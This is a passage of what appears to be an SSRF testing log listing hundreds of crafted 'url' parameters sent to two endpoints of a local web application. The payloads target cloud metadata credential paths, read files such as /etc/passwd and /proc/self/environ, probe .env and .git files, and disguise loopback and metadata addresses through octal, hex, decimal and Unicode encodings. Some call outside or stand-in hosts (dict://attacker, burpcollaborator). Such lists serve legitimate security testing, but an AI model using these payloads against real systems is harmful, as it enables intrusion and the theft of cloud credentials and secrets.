`http://localhost:4200/api/config?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/config?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/config?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/config?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/config?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/config?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/config?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/config?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/config?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/config?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/config?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/config?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/config?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/config?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/config?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/config?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/config?url=127.0.0.0` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/config?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/config?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/config?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/config?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/config?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/config?url=3232235521` +- Testing: `http://localhost:4200/api/config?url=3232235777` +- Testing: `http://localhost:4200/api/config?url=425.510.425.510` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/config?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/config?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/config?url=instance-data` +- Testing: `http://localhost:4200/api/config?url=localhost%3A22` +- Testing: `http://localhost:4200/api/config?url=localhost%3A443` +- Testing: `http://localhost:4200/api/config?url=localhost%3A80` +- Testing: `http://localhost:4200/api/config?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/config?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/config?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/config?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/config?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/config?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/config?url=loopback` +- Testing: `http://localhost:4200/api/config?url=loopback%3A22` +- Testing: `http://localhost:4200/api/config?url=loopback%3A80` +- Testing: `http://localhost:4200/api/config?url=loopback%3A443` +- Testing: `http://localhost:4200/api/config?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/config?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/config?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/config?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/config?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/config?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/config?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/config?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/config?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/config?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/config?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/config?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/config?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/config?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/config?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/config?url=127.1%3A80` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/config?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/config?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/config?url=2130706433%2F` +- Testing: `http://localhost:4200/api/config?url=3232235521%2F` +- Testing: `http://localhost:4200/api/config?url=3232235777%2F` +- Testing: `http://localhost:4200/api/config?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/config?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/config?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/config?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/config?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/config?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/config?url=0%2F` +- Testing: `http://localhost:4200/api/config?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/auth_test +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth_test?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/auth_test?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/auth_test?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/auth_test?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/auth_test?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/auth_test?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/auth_test?url=127.1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=0` +- Testing: `http://localhost:4200/api/auth_test?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/auth_test?url=127.127.127.127` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.1.3` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.0` +- Testing: `http://localhost:4200/api/auth_test?url=2130706433` +- Testing: `http://localhost:4200/api/auth_test?url=017700000001` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f000001` +- Testing: `http://localhost:4200/api/auth_test?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/auth_test?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/auth_test?url=google.com.localhost` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/auth_test?url=localtest.me` +- Testing: `http://localhost:4200/api/auth_test?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/auth_test?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/auth_test?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/auth_test?url=2130706433%2F` +- Testing: `http://localhost:4200/api/auth_test?url=3232235521%2F` +- Testing: `http://localhost:4200/api/auth_test?url=3232235777%2F` +- Testing: `http://localhost:4200/api/auth_test?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/auth_test?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/auth_test?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/auth_test?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/auth_test?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth_test?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth_test?url=0%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=localtest.me` +- Testing: `http://localhost:4200/api/auth_test?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/auth_test?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/auth_test?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/auth_test?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/auth_test?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth_test?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.1.3` +- Testing: `http://localhost:4200/api/auth_test?url=0` +- Testing: `http://localhost:4200/api/auth_test?url=127.1` +- Testing: `http://localhost:4200/api/auth_test?url=127.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=localhost` +- Testing: `http://localhost:4200/api/auth_test?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/auth_test?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/auth_test?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/auth_test?url=7F000001` +- Testing: `http://localhost:4200/api/auth_test?url=2130706433` +- Testing: `http://localhost:4200/api/auth_test?url=6425673729` +- Testing: `http://localhost:4200/api/auth_test?url=127001` +- Testing: `http://localhost:4200/api/auth_test?url=127_0._0_1` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/auth_test?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/auth_test?url=localtest.me` +- Testing: `http://localhost:4200/api/auth_test?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/auth_test?url=127.127.127.127` +- Testing: `http://localhost:4200/api/auth_test?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth_test?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f000001` +- Testing: `http://localhost:4200/api/auth_test?url=017700000001` +- Testing: `http://localhost:4200/api/auth_test?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/auth_test?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/auth_test?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/auth_test?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/auth_test?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/auth_test?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth_test?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth_test?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/auth_test?url=169.254.169.254` +- Testing: `http://localhost:4200/api/auth_test?url=2852039166` +- Testing: `http://localhost:4200/api/auth_test?url=7147006462` +- Testing: `http://localhost:4200/api/auth_test?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/auth_test?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/auth_test?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/auth_test?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: 